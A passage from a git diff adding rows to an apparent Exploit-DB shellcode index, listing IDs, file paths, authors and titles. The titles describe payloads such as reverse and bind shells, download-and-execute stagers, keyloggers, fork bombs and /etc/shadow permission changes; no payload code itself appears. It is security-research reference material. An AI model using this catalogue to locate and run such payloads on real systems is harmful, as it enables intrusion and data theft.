bytes)",2015-06-15,B3mB4m,shellcode,lin_x86 +37289,shellcodes/lin_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,lin_x86 +37297,shellcodes/lin_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,lin_x86 +37358,shellcodes/lin_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 +37359,shellcodes/lin_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 +37362,shellcodes/lin_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,lin_x86-64 +37365,shellcodes/lin_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,lin_x86 +37366,shellcodes/lin_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 +37384,shellcodes/lin_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,lin_x86 +37390,shellcodes/lin_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 +37391,shellcodes/lin_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 +37392,shellcodes/lin_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 +37393,shellcodes/lin_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 +37401,shellcodes/lin_x86-64/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,lin_x86-64 +37495,shellcodes/lin_x86/37495.py,"Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,lin_x86 +37664,shellcodes/win_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,win_x86 +37749,shellcodes/lin_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,lin_x86 +37758,shellcodes/win_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,win_x86 +37762,shellcodes/lin_x86/37762.py,"Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,lin_x86 +37895,shellcodes/win_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,win_x86-64 +38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx +38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z +38088,shellcodes/lin_x86/38088.c,"Linux/x86 - execve /bin/bash Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,lin_x86 +38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator +38116,shellcodes/lin_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,lin_x86 +38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx +38150,shellcodes/lin_x86-64/38150.txt,"Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,lin_x86-64 +38194,shellcodes/android/38194.c,"Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android +38239,shellcodes/lin_x86-64/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,lin_x86-64 +38469,shellcodes/lin_x86-64/38469.c,"Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,lin_x86-64 +38708,shellcodes/lin_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,lin_x86-64 +38815,shellcodes/lin_x86-64/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,lin_x86-64 +38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator +39149,shellcodes/lin_x86-64/39149.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,lin_x86-64 +39152,shellcodes/lin_x86-64/39152.c,"Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,lin_x86-64 +39160,shellcodes/lin_x86/39160.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,lin_x86 +39185,shellcodes/lin_x86-64/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,lin_x86-64 +39203,shellcodes/lin_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,lin_x86-64 +39204,shellcodes/lin_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,lin_x86 +39312,shellcodes/lin_x86-64/39312.c,"Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,lin_x86-64 +39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux +39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux +39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux +39383,shellcodes/lin_x86-64/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)",2016-01-29,"Sathish kumar",shellcode,lin_x86-64 +39388,shellcodes/lin_x86-64/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64 +39389,shellcodes/lin_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,lin_x86 +39390,shellcodes/lin_x86-64/39390.c,"Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,lin_x86-64 +39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm +39519,shellcodes/win_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,win_x86 +39578,shellcodes/lin_x86-64/39578.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,lin_x86-64 +39617,shellcodes/lin_x86-64/39617.c,"Linux/x86-64 - execve /bin/sh Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,lin_x86-64 +39624,shellcodes/lin_x86-64/39624.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64 +39625,shellcodes/lin_x86-64/39625.c,"Linux/x86-64 - execve /bin/bash Shellcode (33 bytes)",2016-03-28,"Ajith Kp",shellcode,lin_x86-64 +39684,shellcodes/lin_x86-64/39684.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,lin_x86-64 +39700,shellcodes/lin_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,lin_x86-64 +39718,shellcodes/lin_x86-64/39718.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,lin_x86-64 +40094,shellcodes/win_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,win_x86 +39722,shellcodes/lin_x86/39722.c,"Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86 +39723,shellcodes/lin_x86/39723.c,"Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,lin_x86 +39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator +39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows +39754,shellcodes/win_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,win_x86 +39758,shellcodes/lin_x86-64/39758.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39763,shellcodes/lin_x86-64/39763.c,"Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows +39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator +39847,shellcodes/lin_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39851,shellcodes/lin_x86/39851.c,"Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,lin_x86 +39869,shellcodes/lin_x86-64/39869.c,"Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple +39900,shellcodes/win_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,win_x86 +39901,shellcodes/lin_x86/39901.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,lin_x86 +39914,shellcodes/win_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,win_x86 +39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows +40005,shellcodes/win_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40026,shellcodes/lin_x86/40026.txt,"Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,lin_x86 +40029,shellcodes/lin_x86-64/40029.c,"Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,lin_x86-64 +40052,shellcodes/lin_x86-64/40052.c,"Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,lin_x86-64 +40056,shellcodes/lin_x86/40056.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,lin_x86 +40061,shellcodes/lin_x86-64/40061.c,"Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,lin_x86-64 +40075,shellcodes/lin_x86/40075.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,lin_x86 +40079,shellcodes/lin_x86-64/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,lin_x86-64 +40110,shellcodes/lin_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,lin_x86 +40122,shellcodes/lin_x86-64/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,lin_x86-64 +40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 +40131,shellcodes/lin_x86/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,shellcode,lin_x86 +40139,shellcodes/lin_x86-64/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,lin_x86-64 +40175,shellcodes/win_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40179,shellcodes/lin_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,lin_x86 +40222,shellcodes/lin_x86/40222.c,"Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,lin_x86 +40223,shellcodes/lin_x86/40223.c,"Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,lin_x86 +40245,shellcodes/win_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40246,shellcodes/win_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40259,shellcodes/win_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40549,shellcodes/win_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +40560,shellcodes/win_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,win_x86 +40781,shellcodes/win_x86-64/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +40808,shellcodes/lin_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,lin_x86-64 +40821,shellcodes/win_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +40872,shellcodes/lin_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,lin_x86 +40924,shellcodes/lin_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,lin_x86 +40981,shellcodes/win_x86-64/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +41072,shellcodes/win_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 +41089,shellcodes/lin_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,lin_x86-64 +41128,shellcodes/lin_x86-64/41128.c,"Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,lin_x86-64 +41174,shellcodes/lin_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,lin_x86-64 +41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux +41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator +41282,shellcodes/lin_x86/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,lin_x86 +41375,shellcodes/linux/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux +41381,shellcodes/win_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,win_x86 +41398,shellcodes/lin_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,lin_x86-64 +41403,shellcodes/lin_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,lin_x86 +41439,shellcodes/lin_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,lin_x86-64 +41467,shellcodes/win_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,win_x86 +41468,shellcodes/lin_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,lin_x86-64 +41477,shellcodes/lin_x86-64/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,lin_x86-64 +41481,shellcodes/win_x86/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",shellcode,win_x86 +41498,shellcodes/lin_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64 +41503,shellcodes/lin_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,lin_x86-64 +41509,shellcodes/lin_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64 +41510,shellcodes/lin_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,lin_x86-64 +41581,shellcodes/win_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,win_x86 +41630,shellcodes/lin_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,shellcode,lin_x86 +41631,shellcodes/lin_x86/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,lin_x86 +41635,shellcodes/lin_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,shellcode,lin_x86 +42295,shellcodes/lin_x86/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,lin_x86 +41723,shellcodes/lin_x86/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,lin_x86 +41750,shellcodes/lin_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,shellcode,lin_x86-64 +41757,shellcodes/lin_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,lin_x86 +41827,shellcodes/win_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,win_x86-64 +41883,shellcodes/lin_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,lin_x86-64 +41909,shellcodes/lin_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,lin_x86 +41969,shellcodes/lin_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,lin_x86 +41970,shellcodes/lin_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,lin_x86-64 +42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows +42126,shellcodes/lin_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,lin_x86-64 +42177,shellcodes/lin_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,lin_x86 +42179,shellcodes/lin_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,lin_x86-64 +42208,shellcodes/lin_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,lin_x86 +42254,shellcodes/lin_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,lin_x86 +42339,shellcodes/lin_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,lin_x86-64 +42428,shellcodes/lin_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,lin_x86 +42485,shellcodes/lin_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,lin_x86-64 +42522,shellcodes/lin_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64 +42523,shellcodes/lin_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,lin_x86-64 +42594,shellcodes/lin_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,lin_x86 +42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm +42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm +42791,shellcodes/lin_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,lin_x86-64 +42977,shellcodes/lin_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,lin_x86 +42992,shellcodes/win_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 diff --git a/searchsploit b/searchsploit old mode 100644 new mode 100755